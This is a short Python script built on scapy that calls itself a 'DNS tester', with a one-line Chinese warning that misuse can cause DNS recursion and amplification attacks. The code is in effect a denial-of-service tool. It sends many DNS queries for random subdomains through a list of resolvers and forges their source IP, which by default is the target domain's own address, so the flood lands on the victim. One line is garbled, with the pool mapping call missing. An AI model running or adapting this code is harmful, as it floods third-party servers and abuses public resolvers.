如果使用不当 或造成DNS递归攻击和DNS放大攻击哦。
#!/usr/bin/env python #coding:utf-8 # Author: Beining --<> # Purpose: A most easy but powerful DNS tester # Created: 01/15/2015 import os import sys import unittest import socket import random from multiprocessing.dummy import Pool as ThreadPool from scapy import * from scapy.all import * import csv global DNS_IP_LIST DNS_IP_LIST = [] global FAKE_IP FAKE_IP = '' #---------------------------------------------------------------------- def dns_amp(qname_address): """""" dns_ip = random.choice(DNS_IP_LIST) a = IP(dst=dns_ip,src=FAKE_IP) b = UDP(dport=53) c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0) c.qd=DNSQR(qname=qname_address,qtype=1,qclass=1) p = a/b/c send(p) #---------------------------------------------------------------------- def main(address, time, length, thread_num, fake_ip): """""" domain_list = [''.join(map(lambda xx:(hex(ord(xx))[2:]),os.urandom(int(length)))) + '.' + str(address) for i in range(int(time))] pool = ThreadPool(int(thread_num)) results =, domain_list) #close the pool and wait for the work to finish pool.close() pool.join() #---------------------------------------------------------------------- def read_dns_ip(filename = './nameservers.csv'): """""" dns_ip_list = [] with open(filename, 'rb') as f: reader = csv.reader(f) for row in reader: if reader.line_num == 1: continue dns_ip_list.append(row[0]) return dns_ip_list #---------------------------------------------------------------------- if __name__=='__main__': address = str(sys.argv[1]) time = int(sys.argv[2]) thread_num = int(sys.argv[3]) try: FAKE_IP = str((sys.argv[4])) except: FAKE_IP = socket.getaddrinfo("www." + address, 80, 0, 0, socket.SOL_TCP)[0][4][0] try: dns_filename = str((sys.argv[5])) except: dns_filename = './nameservers.csv' try: length = int(sys.argv[6]) except: length = random.randint(6, 32) print('Reading DNS IP list...') DNS_IP_LIST = read_dns_ip(dns_filename) print('Start!') main(address, time, length, thread_num, FAKE_IP) print('Done!')